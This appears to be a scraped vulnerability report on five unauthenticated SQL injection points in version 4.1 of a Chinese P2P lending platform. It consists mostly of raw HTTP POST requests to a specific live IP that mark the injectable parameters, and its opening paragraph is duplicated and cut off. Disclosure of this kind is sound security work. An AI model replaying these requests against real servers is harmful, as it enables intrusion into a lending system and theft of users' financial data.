VULHUB ™

### 简要描述： 帝友P2P借贷系统SQL注入五处(无需登录) ### 详细说明： 帝友p2p借贷系统v4.1 http://115.47.56.82:80/ 一:username ``` POST /blacklist/index.html HTTP/1.1 Content-Length: 14 Content-Type: application/x-www-form-urlencoded Referer: http://115.47.56.82:80/ Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19 Host: 115.47.56.82 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36...

### 简要描述： 帝友P2P借贷系统SQL注入五处(无需登录) ### 详细说明： 帝友p2p借贷系统v4.1 http://115.47.56.82:80/ 一:username ``` POST /blacklist/index.html HTTP/1.1 Content-Length: 14 Content-Type: application/x-www-form-urlencoded Referer: http://115.47.56.82:80/ Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19 Host: 115.47.56.82 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* username=213 ``` [<img src="https://images.seebug.org/upload/201508/1600524260a73afd25a716f7fd6fe0669c293836.png" alt="username.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/1600524260a73afd25a716f7fd6fe0669c293836.png) 二:borrow_style ``` POST /index.php?full_success&page=2 HTTP/1.1 Content-Length: 71 Content-Type: application/x-www-form-urlencoded Referer: http://115.47.56.82:80/ Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19 Host: 115.47.56.82 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* account_status=all&borrow_period=all&borrow_style=213&borrow_type=all ``` [<img src="https://images.seebug.org/upload/201508/16005423241036d7fbf1360c18d317f1af625d4c.png" alt="borrow_style.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/16005423241036d7fbf1360c18d317f1af625d4c.png) 三：keywords ``` POST /index.php?user&q=login HTTP/1.1 Content-Length: 46 Content-Type: application/x-www-form-urlencoded Referer: http://115.47.56.82:80/ Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19 Host: 115.47.56.82 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* keywords=123&password=g00dPa%24%24w0rD&url=1 ``` [<img src="https://images.seebug.org/upload/201508/1600561472597d8be4c510a8fd95ca476f3ceaa5.jpg" alt="keyword.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/1600561472597d8be4c510a8fd95ca476f3ceaa5.jpg) ### 漏洞证明： 四：email ``` POST /?user&q=getpwd HTTP/1.1 Content-Length: 37 Content-Type: application/x-www-form-urlencoded Referer: http://115.47.56.82:80/ Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19 Host: 115.47.56.82 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Submit=&email=213&username=tsisktri ``` [<img src="https://images.seebug.org/upload/201508/16005754cb75697db1a83a7b471567040ea45155.png" alt="email.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/16005754cb75697db1a83a7b471567040ea45155.png) 五：username ``` POST /?user&q=getpwd HTTP/1.1 Content-Length: 47 Content-Type: application/x-www-form-urlencoded Referer: http://115.47.56.82:80/ Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19 Host: 115.47.56.82 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Submit=&email=sample%40email.tst&username=123 ``` [<img src="https://images.seebug.org/upload/201508/1601053838383e6ca3552ef2e094b6b1b26f1756.jpg" alt="username2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/1601053838383e6ca3552ef2e094b6b1b26f1756.jpg)